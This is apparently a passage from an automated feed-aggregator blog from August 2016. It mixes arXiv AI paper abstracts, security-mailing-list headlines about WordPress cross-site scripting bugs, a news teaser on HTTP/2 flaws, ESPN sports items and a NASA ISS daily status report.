Our interest in this paper is in optimisation problems that are intractable to solve by direct numerical optimisation, but nevertheless have significant amounts of relevant domain-specific knowledge. The category of heuristic search techniques known as estimation of distribution algorithms (EDAs) seek to incrementally sample from probability distributions in which optimal (or near-optimal) solutions have increasingly higher probabilities. Can we use domain knowledge to assist the estimation of these distributions? To answer this in the affirmative, we need: (a) a general-purpose technique for the incorporation of domain knowledge when constructing models for optimal values; and (b) a way of using these models to generate new data samples. Here we investigate a combination of the use of Inductive Logic Programming (ILP) for (a), and standard logic-programming machinery to generate new samples for (b). Specifically, on each iteration of distribution estimation, an ILP engine is used to construct a model for good solutions. The resulting theory is then used to guide the generation of new data instances, which are now restricted to those derivable using the ILP model in conjunction with the background knowledge). We demonstrate the approach on two optimisation problems (predicting optimal depth-of-win for the KRK endgame, and job-shop scheduling). Our results are promising: (a) On each iteration of distribution estimation, samples obtained with an ILP theory have a substantially greater proportion of good solutions than samples without a theory; and (b) On termination of distribution estimation, samples obtained with an ILP theory contain more near-optimal samples than samples without a theory. Taken together, these results suggest that the use of ILP-constructed theories could be a useful technique for incorporating complex domain-knowledge into estimation distribution procedures.



from cs.AI updates on arXiv.org http://ift.tt/2aRB1O9
via IFTTT

Autonomous Grounding of Visual Field Experience through Sensorimotor Prediction. (arXiv:1608.01127v1 [cs.RO])

In a developmental framework, autonomous robots need to explore the world and learn how to interact with it. Without an a priori model of the system, this opens the challenging problem of having robots master their interface with the world: how to perceive their environment using their sensors, and how to act in it using their motors. The sensorimotor approach of perception claims that a naive agent can learn to master this interface by capturing regularities in the way its actions transform its sensory inputs. In this paper, we apply such an approach to the discovery and mastery of the visual field associated with a visual sensor. A computational model is formalized and applied to a simulated system to illustrate the approach.



from cs.AI updates on arXiv.org http://ift.tt/2ausIEx
via IFTTT

A Novel Approach for Data-Driven Automatic Site Recommendation and Selection. (arXiv:1608.01212v1 [cs.AI])

This paper presents a novel, generic, and automatic method for data-driven site selection. Site selection is one of the most crucial and important decisions made by any company. Such a decision depends on various factors of sites, including socio-economic, geographical, ecological, as well as specific requirements of companies. The existing approaches for site selection (commonly used by economists) are manual, subjective, and not scalable, especially to Big Data. The presented method for site selection is robust, efficient, scalable, and is capable of handling challenges emerging in Big Data. To assess the effectiveness of the presented method, it is evaluated on real data (collected from Federal Statistical Office of Germany) of around 200 influencing factors which are considered by economists for site selection of Supermarkets in Germany (Lidl, EDEKA, and NP). Evaluation results show that there is a big overlap (86.4 \%) between the sites of existing supermarkets and the sites recommended by the presented method. In addition, the method also recommends many sites (328) for supermarket where a store should be opened.



from cs.AI updates on arXiv.org http://ift.tt/2aRBqjv
via IFTTT

Learning to Rank for Synthesizing Planning Heuristics. (arXiv:1608.01302v1 [cs.AI])

We investigate learning heuristics for domain-specific planning. Prior work framed learning a heuristic as an ordinary regression problem. However, in a greedy best-first search, the ordering of states induced by a heuristic is more indicative of the resulting planner's performance than mean squared error. Thus, we instead frame learning a heuristic as a learning to rank problem which we solve using a RankSVM formulation. Additionally, we introduce new methods for computing features that capture temporal interactions in an approximate plan. Our experiments on recent International Planning Competition problems show that the RankSVM learned heuristics outperform both the original heuristics and heuristics learned through ordinary regression.



from cs.AI updates on arXiv.org http://ift.tt/2autsJS
via IFTTT

In Love With a Robot: the Dawn of Machine-To-Machine Marketing. (arXiv:1302.4475v3 [cs.AI] UPDATED)

The article looks at mass market artificial intelligence tools in the context of their ever-growing sophistication, availability and market penetration. The subject is especially relevant today for these exact reasons - if a few years ago AI was the subject of high tech research and science fiction novels, today, we increasingly rely on cloud robotics to cater to our daily needs - to trade stock, predict weather, manage diaries, find friends and buy presents online.



from cs.AI updates on arXiv.org http://ift.tt/Y4TTd5
via IFTTT

A Stochastic Temporal Model of Polyphonic MIDI Performance with Ornaments. (arXiv:1404.2314v2 [cs.AI] UPDATED)

We study indeterminacies in realization of ornaments and how they can be incorporated in a stochastic performance model applicable for music information processing such as score-performance matching. We point out the importance of temporal information, and propose a hidden Markov model which describes it explicitly and represents ornaments with several state types. Following a review of the indeterminacies, they are carefully incorporated into the model through its topology and parameters, and the state construction for quite general polyphonic scores is explained in detail. By analyzing piano performance data, we find significant overlaps in inter-onset-interval distributions of chordal notes, ornaments, and inter-chord events, and the data is used to determine details of the model. The model is applied for score following and offline score-performance matching, yielding highly accurate matching for performances with many ornaments and relatively frequent errors, repeats, and skips.



from cs.AI updates on arXiv.org http://ift.tt/OFQwbf
via IFTTT

Probabilistic Reasoning via Deep Learning: Neural Association Models. (arXiv:1603.07704v2 [cs.AI] UPDATED)

In this paper, we propose a new deep learning approach, called neural association model (NAM), for probabilistic reasoning in artificial intelligence. We propose to use neural networks to model association between any two events in a domain. Neural networks take one event as input and compute a conditional probability of the other event to model how likely these two events are to be associated. The actual meaning of the conditional probabilities varies between applications and depends on how the models are trained. In this work, as two case studies, we have investigated two NAM structures, namely deep neural networks (DNN) and relation-modulated neural nets (RMNN), on several probabilistic reasoning tasks in AI, including recognizing textual entailment, triple classification in multi-relational knowledge bases and commonsense reasoning. Experimental results on several popular datasets derived from WordNet, FreeBase and ConceptNet have all demonstrated that both DNNs and RMNNs perform equally well and they can significantly outperform the conventional methods available for these reasoning tasks. Moreover, compared with DNNs, RMNNs are superior in knowledge transfer, where a pre-trained model can be quickly extended to an unseen relation after observing only a few training samples. To further prove the effectiveness of the proposed models, in this work, we have applied NAMs to solving challenging Winograd Schema (WS) problems. Experiments conducted on a set of WS problems prove that the proposed models have the potential for commonsense reasoning.



from cs.AI updates on arXiv.org http://ift.tt/1UPn4hD
via IFTTT

Track

3 Aug 2016 - 19:38, node/12573/track, Anonymous (not verified), details ... 3 Aug 2016 - 18:27, http://ift.tt/1JEPCAV, Anonymous (not ...

from Google Alert - anonymous http://ift.tt/2avzbwV
via IFTTT

[FD] Cross-Site Scripting in WordPress Landing Pages Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Activity Log WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in search function Activity Log WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

4 Flaws hit HTTP/2 Protocol that could allow Hackers to Disrupt Servers

If you think that the HTTP/2 protocol is more secure than the standard HTTP (Hypertext Transfer Protocol), then you might be wrong, as it took researchers just four months to discover four flaws in the HTTP/2 protocol. HTTP/2 was launched properly just in May last year after Google bundled its SPDY project into HTTP/2 in February in an effort to speed up the loading of web pages as well as


from The Hacker News http://ift.tt/2atPkVO
via IFTTT

SportsCenter Video: Buster Olney says P Dylan Bundy (7 K, 1 H on Tuesday) has "ability to put the Orioles over the top" (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens: John Harbaugh says recently waived RB Trent Richardson "definitely on our radar" to rejoin the team in future (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: RB Terrance West sits No. 3 on depth chart, but has been the No. 1 playmaker in camp so far - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Netuitive
Full stack #monitoring powered by machine learning & #analytics for cloud infrastructure, apps & services #devops #AWS Free trial at https://t.co/TtaSrnw9m3
Reston, Va.
http://t.co/HUDJScHzFL
Following: 1622 - Followers: 1820

August 03, 2016 at 09:40AM via Twitter http://twitter.com/Netuitive

ISS Daily Summary Report – 08/02/2016

Fluid Shifts Imaging with Chibis in the Service Module (SM): With assistance from the ground team two crewmembers began the second week of the Fluid Shifts experiment run by configuring the Ultrasound 2 hardware prior to performing ultrasound scans on in the SM while using the Chibis.  Poor video quality of the Ultrasound scan for the first crewmember only allowed 50% of the test points to be completed.  Operations for the second crewmember were deferred to allow ground teams to troubleshoot.  Two simultaneous issues were found:  an encoder misconfiguration issue and a loose cable onboard.  A reboot of the encoder by ground teams and adjustment of the cable by the crew resolved the problem.  Fluid Shifts operations will resume tomorrow and today’s activities will be rescheduled.  The Fluids Shift investigation is divided into three segments: Dilution Measures, Baseline Imaging, and Baseline Imaging using the Russian Chibis Lower Body Negative Pressure (LBNP) device. The experiment measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures.  Frozen in Time, Jeff Williams and MELFI: Ten years ago today, then Flight Engineer Jeff Williams placed the first science samples into the Minus Eighty Degree Laboratory Freezer for the International Space Station (MELFI) Flight Unit 1 (FU1) in the U.S. Laboratory/Destiny during Expedition 13.  MELFI is a cold storage unit that maintains experiment samples at temperatures ranging from just above freezing to ultra-cold.  Expedition 13 was the beginning of many years of science collaboration between Williams and MELFI.  Williams arrived at the ISS on April 1, 2006, and the MELFI FU1 arrived on July 6 of the same year.  Jeff then activated MELFI for the first time on July 19.  As Flight Engineer during Expedition 21, Williams performed maintenance on MELFI by replacing a failed Electronics Unit.  Now, as commander of Expedition 48, he is using all three MELFI flight units onboard ISS to further the science goals of ISS.  Over the last ten years, Williams and MELFI have provided a wide range of support to life science experiments and enhanced research capabilities on the ISS.  To say the least, Jeff has had an interesting 10 year history with MELFI.  Mouse Epigenetics Cage Unit Maintenance: The crew performed maintenance activities for the Mouse Epigenetics Habitat Cage Units by transferring the mice from one habitat cage unit to another and refilling the cage units with water. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. Fine Motor Skills: A series of interactive tasks on a touchscreen tablet were completed for the Fine Motor Skills investigation. This investigation is critical during long-duration space missions, particularly those skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember’s fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment.  Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. NanoRacks (NR) Plate Reader 2 Module-29 Test Plate Removal: Following last week’s analysis of the NanoRacks Module-29 (NanoRacks-Fluorescent Polarization in Microgravity) test plates, today the crew removed the fifth test plate from the sample tray and discarded all NR Module 29 hardware. The analysis was performed by sequentially inserting and removing five individual NR Module -29 test plates to and from the sample tray which allows scientists to study chemical reactions using fluorescence polarization which produces changes in light when molecules bind together. This technique enables researchers to measure the interactions of proteins with deoxyribonucleic acid (DNA), or antibodies, and many other biomedical functions. NanoRacks Module -29 validates a commercial Plate Reader instrument that detects changes in light for these types of reactions in a multiwell plate, a flat plate with 384 wells or tiny test tubes, to examine microgravity’s effect on fluorescent polarization, which paves the way for advanced biology research and drug development in space. Microgravity Experiment Research Locker/INcubator-5 (MERLIN 5) Transfer to Expedite the Processing of Experiments to Space Station (EXPRESS) Rack 5 (ER5): The MERLIN-5 was removed from ER7 and installed in ER5 to support samples for the Heart Cells investigation returning on SpX-9.  ER7 has a failed power control module, which prevents the MERLIN from being powered on.  Moving it to ER5 will allow MERLIN to be powered on in time to support the SpaceX-9 return.  The MERLIN provides a single middeck locker EXPRESS Rack compatible freezer/refrigerator or incubator that can be used for a variety of experiments. Extravehicular Activity (EVA) Preparation: In preparation for US EVA #35 currently scheduled for August 19, the crew inspected Retractable Equipment Tethers (RETs) for damaged cords. Each RET cord must be inspected prio to EVA use, then stowed in a protective bag to prevent potential damage.  On Board Training (OBT) ISS Emergency Simulation: Following yesterday’s training review covering depress, ammonia, US fire and Russian Segment fire events, today all crew members, with support from ground teams, completed a training exercise with the following objectives: Practice ISS emergency response with crew and ground roles based on information provided by simulator displays. Physically translate through ISS to the appropriate response locations to visualize the use of Station equipment and interfaces. Practice procedure execution and associated decision making based on cues provided by simulator. Practice communication and coordination with […]

from ISS On-Orbit Status Report http://ift.tt/2aMQvBy
via IFTTT